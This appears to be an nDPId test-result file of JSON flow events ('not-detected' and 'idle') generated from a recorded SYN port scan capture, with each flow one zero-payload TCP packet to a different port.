-00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1728,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061006,"flow_last_seen":1278275061006,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":56738,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1728,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061006,"flow_last_seen":1278275061006,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":56738,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":997,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060006,"flow_last_seen":1278275060006,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1443,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":997,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060006,"flow_last_seen":1278275060006,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1050,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060115,"flow_last_seen":1278275060115,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1443,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1050,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060115,"flow_last_seen":1278275060115,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":336,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058721,"flow_last_seen":1278275058721,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3493,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":336,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058721,"flow_last_seen":1278275058721,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3493,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":366,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058845,"flow_last_seen":1278275058845,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3493,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":366,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058845,"flow_last_seen":1278275058845,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3493,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1254,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060389,"flow_last_seen":1278275060389,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5544,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1254,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060389,"flow_last_seen":1278275060389,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5544,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1306,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060490,"flow_last_seen":1278275060490,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5544,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1306,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060490,"flow_last_seen":1278275060490,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5544,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1621,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060900,"flow_last_seen":1278275060900,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5550,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1621,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060900,"flow_last_seen":1278275060900,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5550,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1684,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061001,"flow_last_seen":1278275061001,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5550,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1684,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061001,"flow_last_seen":1278275061001,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5550,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":575,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059409,"flow_last_seen":1278275059409,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1455,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":575,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059409,"flow_last_seen":1278275059409,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1455,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":645,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059518,"flow_last_seen":1278275059518,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1455,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":645,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059518,"flow_last_seen":1278275059518,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1455,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1790,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061108,"flow_last_seen":1278275061108,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5555,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1790,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061108,"flow_last_seen":1278275061108,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5555,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1867,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061211,"flow_last_seen":1278275061211,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5555,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1867,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061211,"flow_last_seen":1278275061211,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5555,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":432,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059030,"flow_last_seen":1278275059030,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1461,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":432,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059030,"flow_last_seen":1278275059030,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1461,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":475,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059155,"flow_last_seen":1278275059155,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1461,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":475,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059155,"flow_last_seen":1278275059155,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1461,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":868,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059846,"flow_last_seen":1278275059846,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5560,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":868,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059846,"flow_last_seen":1278275059846,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5560,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":937,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059956,"flow_last_seen":1278275059956,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5560,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":937,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059956,"flow_last_seen":1278275059956,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5560,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":520,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059280,"flow_last_seen":1278275059280,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3517,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":520,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059280,"flow_last_seen":1278275059280,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3517,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":795,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059736,"flow_last_seen":1278275059736,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5566,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":795,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059736,"flow_last_seen":1278275059736,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5566,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":551,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059405,"flow_last_seen":1278275059405,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3517,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":551,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059405,"flow_last_seen":1278275059405,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3517,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":860,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059845,"flow_last_seen":1278275059845,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5566,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":860,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059845,"flow_last_seen":1278275059845,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5566,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1441,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060642,"flow_last_seen":1278275060642,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":52673,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1441,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060642,"flow_last_seen":1278275060642,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":52673,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1505,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060744,"flow_last_seen":1278275060744,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":52673,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1505,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060744,"flow_last_seen":1278275060744,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":52673,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":264,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058530,"flow_last_seen":1278275058530,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9666,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
